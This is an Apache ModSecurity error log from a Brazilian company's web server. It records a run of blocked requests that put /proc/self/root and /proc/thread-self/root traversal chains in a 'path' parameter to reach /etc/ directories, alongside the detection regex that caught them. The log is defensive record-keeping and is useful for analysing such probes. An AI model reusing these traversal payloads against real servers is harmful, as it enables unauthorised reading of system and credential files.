[Mon Mar 16 12:53:40.984286 2026] [:error] [pid 21946:tid 140411616036608] [client 74.7.243.203:58448] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgnhHbQATo66fKoS7xQIAAAAM8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:53:43.334349 2026] [:error] [pid 10831:tid 140411691570944] [client 74.7.243.203:41130] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgnh46lpbStxTqkSkttBwAAAkY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:53:44.651402 2026] [:error] [pid 21533:tid 140411699963648] [client 74.7.243.203:41136] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgniHjZBu2q05ozVU9YPAAAAUU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:53:45.975929 2026] [:error] [pid 10651:tid 140411590858496] [client 74.7.243.203:41142] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgnibysWC90G-1nBrBGOAAAAZI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:53:47.309504 2026] [:error] [pid 10831:tid 140411540502272] [client 74.7.243.203:41154] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgni46lpbStxTqkSkttCgAAAlg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:53:48.619330 2026] [:error] [pid 21533:tid 140411557287680] [client 74.7.243.203:41164] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgnjHjZBu2q05ozVU9YPgAAAVY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:53:49.467220 2026] [:error] [pid 21806:tid 140411565680384] [client 74.7.241.46:38610] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgnjdSswJuvopo3lOhfxAAAAJU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 12:53:49.942928 2026] [:error] [pid 10651:tid 140411699963648] [client 74.7.243.203:41180] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgnjbysWC90G-1nBrBGPAAAAYU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:53:51.267094 2026] [:error] [pid 21946:tid 140411574073088] [client 74.7.243.203:55074] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgnj3bQATo66fKoS7xQLAAAANQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:53:52.409009 2026] [:error] [pid 10831:tid 140411574073088] [client 74.7.243.203:55084] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgnkI6lpbStxTqkSkttDAAAAlQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:53:53.840509 2026] [:error] [pid 32654:tid 140411733534464] [client 74.7.243.203:55094] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgnkQlT9VtDQc7bgUyyoAAAAQE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:53:56.264105 2026] [:error] [pid 21533:tid 140411624429312] [client 74.7.243.203:55110] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgnk3jZBu2q05ozVU9YQQAAAU4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:53:57.601941 2026] [:error] [pid 11972:tid 140411624429312] [client 74.7.243.203:55120] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgnlZqj1wV0Si-OkefuvwAAAA4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:53:58.971409 2026] [:error] [pid 11972:tid 140411725141760] [client 74.7.243.203:55124] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgnlpqj1wV0Si-OkefuwAAAAAI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:54:00.313121 2026] [:error] [pid 21946:tid 140411708356352] [client 74.7.243.203:46504] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgnmHbQATo66fKoS7xQNwAAAMQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:54:00.384170 2026] [:error] [pid 21946:tid 140411666392832] [client 74.7.244.31:57094] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abgnmHbQATo66fKoS7xQOAAAAMk"]
[Mon Mar 16 12:54:01.443957 2026] [:error] [pid 21533:tid 140411540502272] [client 74.7.243.203:46510] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgnmXjZBu2q05ozVU9YRAAAAVg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:54:02.778848 2026] [:error] [pid 21533:tid 140411607643904] [client 74.7.243.203:46522] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgnmnjZBu2q05ozVU9YRQAAAVA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:54:03.943181 2026] [:error] [pid 21805:tid 140411674785536] [client 74.7.243.203:46532] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgnm7ABkC4fWIHEf8Hr1wAAAEg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:54:05.348475 2026] [:error] [pid 21805:tid 140411548894976] [client 74.7.243.203:46542] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgnnbABkC4fWIHEf8Hr2gAAAFc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:54:06.699012 2026] [:error] [pid 10651:tid 140411607643904] [client 74.7.243.203:46552] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgnnrysWC90G-1nBrBGQgAAAZA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:54:08.088914 2026] [:error] [pid 21806:tid 140411599251200] [client 74.7.243.203:46560] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgnoNSswJuvopo3lOhfxwAAAJE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
